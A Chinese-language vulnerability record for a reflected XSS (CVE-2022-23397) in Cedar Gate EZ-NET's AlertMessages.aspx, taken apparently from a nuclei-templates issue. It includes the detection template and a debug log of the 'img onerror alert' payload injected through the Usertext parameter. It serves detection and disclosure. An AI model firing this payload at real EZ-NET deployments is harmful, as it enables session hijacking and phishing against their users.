漏洞信息
漏洞名称: Cedar Gate EZ-NET <= 6.8.0 - Reflected XSS
漏洞编号:
漏洞类型: 跨站可执行脚本
漏洞等级: 中危
漏洞描述: 受影响产品: Cedar Gate EZ-NET是一款网络管理软件,广泛用于企业网络环境中,用于监控和管理网络设备。该软件提供了一个用户友好的界面,便于管理员进行网络配置和警报管理。
漏洞解释: 该漏洞存在于EZ-NET的AlertMessages.aspx页面中,通过Usertext参数触发的反射型跨站脚本(XSS)漏洞。攻击者可以构造恶意的URL,当用户访问该URL时,恶意脚本会在用户的浏览器中执行。这是由于应用程序未能对用户输入进行适当的过滤和编码,导致攻击者能够注入可执行的JavaScript代码。
影响分析: 此漏洞允许攻击者在受害者的浏览器上下文中执行任意JavaScript代码,可能导致会话劫持、钓鱼攻击或其他恶意活动。由于这是一个反射型XSS漏洞,攻击者需要诱使用户点击特制的链接才能利用此漏洞。尽管需要用户交互,但该漏洞仍然对企业的网络安全构成威胁,尤其是在内部网络或信任的环境中。
产品厂商: Cedar Gate
产品名称: EZ-NET
影响版本: <= 6.8.0
来源: https://github.com/projectdiscovery/nuclei-templates/issues/12590
类型: projectdiscovery/nuclei-templates:github issues
来源概述
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
| id: CVE-2022-23397
info:
name: Cedar Gate EZ-NET <= 6.8.0 - Reflected XSS
author: srilakivarma
severity: medium
description: |
A reflected XSS vulnerability exists in /EZ-NET60/AlertMessages.aspx via the `Usertext` parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-23397
classification:
cve-id: CVE-2022-23397
cwe-id: CWE-79
tags: cve,xss,cedar,eznet,reflected
variables:
xss_token: "{{randstr}}"
http:
- method: GET
path:
- "{{BaseURL}}/EZ-NET60/AlertMessages.aspx?Usertext=%3Cimg%20src%3Dx%20onerror%3Dalert('{{xss_token}}')%3E"
matchers-condition: or
matchers:
- type: word
part: body
words:
- "<img src=x onerror=alert('{{xss_token}}')>"
- "alert('{{xss_token}}')"
- "<img src=x onerror=alert('{{xss_token}}')>"
- type: regex
part: body
regex:
- "alert\\(['\"]{{xss_token}}['\"]\\)"
|
Debug Data
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
| [CVE-2022-23397] Dumped HTTP request for https://redact.com/EZ-NET60/AlertMessages.aspx?Usertext=%3Cimg%20src%3Dx%20onerror%3Dalert('2zqzyhThxS81lVyT5Xb8wgkFSKa')%3E
GET /EZ-NET60/AlertMessages.aspx?Usertext=%3Cimg%20src%3Dx%20onerror%3Dalert('2zqzyhThxS81lVyT5Xb8wgkFSKa')%3E HTTP/1.1
Host: redact.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
[DBG] [CVE-2022-23397] Dumped HTTP response https://redact.com/EZ-NET60/AlertMessages.aspx?Usertext=%3Cimg%20src%3Dx%20onerror%3Dalert('2zqzyhThxS81lVyT5Xb8wgkFSKa')%3E
HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Alt-Svc: h3=":443"; ma=86400
Cache-Control: private, no-store
Cf-Cache-Status: DYNAMIC
Cf-Ray: 95eee1078e813212-BOM
Content-Type: text/html; charset=utf-8
Date: Mon, 14 Jul 2025 06:14:18 GMT
Expires: Mon, 14 Jul 2025 06:14:18 GMT
Nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}
Pragma: no-cache
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=90lxDu8uhmCuN1Jt6wfFSn9rWc86QHSFH0ZZi%2BElkUazSSfivtdQme4s%2B8IaATkIlfIaVAaZvX0kVVeo8CbAeQ7CTgKgsHR3eIPFek1Z4L0v4Ng%3D"}]}
Server: cloudflare
Set-Cookie: EZNET_ASP.NET_SessionId=05db00yx04rf5obvskr5pwzo; HttpOnly; SameSite=Lax; Path=/
Strict-Transport-Security: max-age=31536000
X-Aspnet-Version: 4.0.30319
[CVE-2022-23397:word-1] [http] [medium] https://redact.com/EZ-NET60/AlertMessages.aspx?Usertext=%3Cimg%20src%3Dx%20onerror%3Dalert('2zqzyhThxS81lVyT5Xb8wgkFSKa')%3E
|